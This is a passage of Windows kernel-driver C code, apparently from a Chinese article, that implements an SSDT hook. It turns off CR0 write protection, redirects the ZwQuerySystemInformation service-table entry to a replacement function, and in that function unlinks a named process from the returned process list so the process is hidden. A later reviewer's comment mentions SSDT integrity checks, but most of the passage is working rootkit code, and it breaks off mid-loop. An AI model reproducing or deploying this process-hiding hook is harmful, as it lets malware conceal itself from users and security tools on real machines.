mov eax, cr0
mov cr0value, eax
and eax, 0fffeffffh //disablewriteprotect
mov cr0, eax
}
//取得原来zwquerysysteminformation的入口地址
realzwquerysysteminformation=(realzwquerysysteminformation)(((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)] );
//hook
((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)]=hookfunc;
//enablewriteprotect
__asm
{
mov eax, cr0value
mov cr0, eax
}
……
return status_success;
}
/*
 * driverunload — DriverUnload routine for this driver.
 *
 * Undoes the SSDT patch applied in the entry routine above: the
 * KeServiceDescriptorTable slot for ZwQuerySystemInformation, which the
 * entry routine pointed at hookfunc, is written back to the original
 * handler saved in realzwquerysysteminformation.  The slot index is taken
 * the same way as at the hook site — the 32-bit immediate that follows the
 * first opcode byte of the ZwQuerySystemInformation stub (x86 `mov eax, imm32`),
 * i.e. the service number.  Lines marked "……" were elided by the article.
 *
 * Param: pdriverobject — the driver object (unused in the visible lines).
 *
 * NOTE(review): the hook path above wraps its table write in a CR0
 * write-protect toggle; no such sequence is visible here, and whether the
 * article elided it cannot be told from this excerpt.  Nothing visible waits
 * for callers still executing inside hookfunc before the image is unloaded.
 * From a defender's side, a patched slot of this kind is what SSDT integrity
 * checks (table entry vs. kernel-image export address) are built to catch.
 */
void driverunload (in pdriver_object pdriverobject)
{
……
// Unhook: restore the original entry address of the system service.
((pservicedescriptortableentry)keservicedescriptortable)->servicetablebase[*(pulong)((puchar)zwquerysysteminformation+1)] = realzwquerysysteminformation;
……
}
ntstatus hookfunc(
in ulong systeminformationclass,
in pvoid systeminformation,
in ulong systeminformationlength,
out pulong returnlength)
{
ntstatus rc;
struct _system_processes *curr;
// 保存上一个进程信息的指针
struct _system_processes *prev = null;
//调用原函数
rc = (realzwquerysysteminformation) (
systeminformationclass,
systeminformation,
systeminformationlength, returnlength);
if(nt_success(rc))
{
if(5 == systeminformationclass)
//如果系统查询类型是systemprocessesandthreadsinformation
{
curr = (struct _system_processes *)systeminformation;
//加第一个偏移量得到第一个system进程的信息首地址
if(curr->nextentrydelta)((char *)curr += curr->nextentrydelta);
while(curr)
{
if(rtlcompareunicodestring(&hide_process_name, &curr->processname, 1) == 0)
{
//找到要隐藏的进程
if(prev)
{
if(curr->nextentrydelta)
{
//要删除的信息在中间
prev->nextentrydelta += curr->nextentrydelta;
}
else
{